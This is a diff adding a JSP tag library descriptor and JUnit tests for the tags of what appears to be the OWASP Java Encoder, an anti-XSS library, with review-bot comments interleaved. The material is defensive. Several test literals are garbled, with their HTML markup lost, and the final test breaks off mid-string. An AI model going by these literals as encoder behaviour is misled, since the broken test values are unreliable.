+ forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. 
In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + \ No newline at end of file 
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java
new file mode 100644
index 0000000..10705ae
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import junit.framework.TestCase;
+import org.springframework.mock.web.MockHttpServletRequest;
+import org.springframework.mock.web.MockHttpServletResponse;
+import org.springframework.mock.web.MockPageContext;
+import org.springframework.mock.web.MockServletContext;
+
+/**
+ * EncodingTagTest is the base class for all unit tests for the tags.
+ * This sets up the ServletContext so that tags can be tested.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public abstract class EncodingTagTest extends TestCase {
+
+ protected MockServletContext _servletContext;
+ protected MockPageContext _pageContext;
+ protected MockHttpServletRequest _request;
+ protected MockHttpServletResponse _response;
+
+ /**
+ * Contructor for the EncodingTagTest
+ * @param testName the name of the test
+ */
+ public EncodingTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ _servletContext = new MockServletContext();
+ _request = new MockHttpServletRequest();
+ _response = new MockHttpServletResponse();
+ _pageContext = new MockPageContext(_servletContext, _request, _response);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java
new file mode 100644
index 0000000..1720d4e
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java
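Review bot: The `tearDown()` override at the end of the hunk only forwards to `super.tearDown()`, which `TestCase` already does, so it can be dropped; the same empty `setUp()`/`tearDown()` pair is then copied into every subclass added in this commit (ForCDATATagTest through ForUriComponentTagTest). The four mock fields are `protected` and non-final so subclasses reach them directly; that is workable because `setUp()` rebuilds all four before each test, and a one-line comment saying so above the fields would save a reader checking, e.g. `// Fresh mocks are created in setUp() before every test; subclasses read them directly.`. The constructor Javadoc reads `Contructor for the EncodingTagTest` — `Constructor`.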
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForCDATATag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATagTest extends EncodingTagTest { + + public ForCDATATagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCDATATag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCDATATag instance = new ForCDATATag(); + String value = "
    ]]>
    "; + String expected = "
    ]]>]]
    "; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java new file mode 100644 index 0000000..7a79d40 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java 
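Review bot: The `value` and `expected` literals in `testDoTag()` appear garbled on this page (the markup inside the quotes was lost in extraction), so the assertion cannot be verified from here; in the real file the expected string deserves a comment stating why `]]>` is split, e.g. `// a literal "]]>" in the data must not terminate the caller-supplied CDATA section` above the assignment, matching the forCDATA description in the TLD earlier in this commit. `System.out.println("doTag")` is noise in a unit test and should go, and the `setUp()`/`tearDown()` overrides that only call `super` are redundant. The same three points apply to ForCssStringTagTest, ForCssUrlTagTest, ForHtmlAttributeTagTest, ForHtmlContentTagTest, ForHtmlTagTest, ForHtmlUnquotedAttributeTagTest, ForJavaScriptAttributeTagTest, ForJavaScriptBlockTagTest, ForJavaScriptSourceTagTest and ForJavaScriptTagTest, as does the Javadoc typo `excersize` → `exercise`.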
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForCssStringTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssStringTagTest extends EncodingTagTest { + + public ForCssStringTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCssStringTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCssStringTag instance = new ForCssStringTag(); + String value = "
    "; + String expected = "\\3c div\\3e"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java new file mode 100644 index 0000000..c787988 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForCssUrlTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssUrlTagTest extends EncodingTagTest {
+
+ public ForCssUrlTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForCssUrlTag.
+ * This is a very simple test that doesn't fully
+ * excersize/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForCssUrlTag instance = new ForCssUrlTag();
+ String value = "\\';";
+ String expected = "\\5c\\27;";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected, results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java
new file mode 100644
index 0000000..34d63fc
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlAttributeTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlAttributeTagTest extends EncodingTagTest { + + public ForHtmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlAttributeTag instance = new ForHtmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java new file mode 100644 index 0000000..9a9703c --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlContentTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlContentTagTest extends EncodingTagTest { + + public ForHtmlContentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlContentTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlContentTag instance = new ForHtmlContentTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java new file mode 100644 index 0000000..9f73173 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlTagTest extends EncodingTagTest { + + public ForHtmlTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlTag instance = new ForHtmlTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java new file mode 100644 index 0000000..4d1cae0 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForHtmlUnquotedAttributeTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest { + + public ForHtmlUnquotedAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForHtmlUnquotedAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag(); + String value = "
    "; + String expected = "<div> </div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java new file mode 100644 index 0000000..6829820 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForJavaScriptAttributeTag.
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptAttributeTagTest extends EncodingTagTest { + + public ForJavaScriptAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForJavaScriptAttributeTag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag(); + String value = "
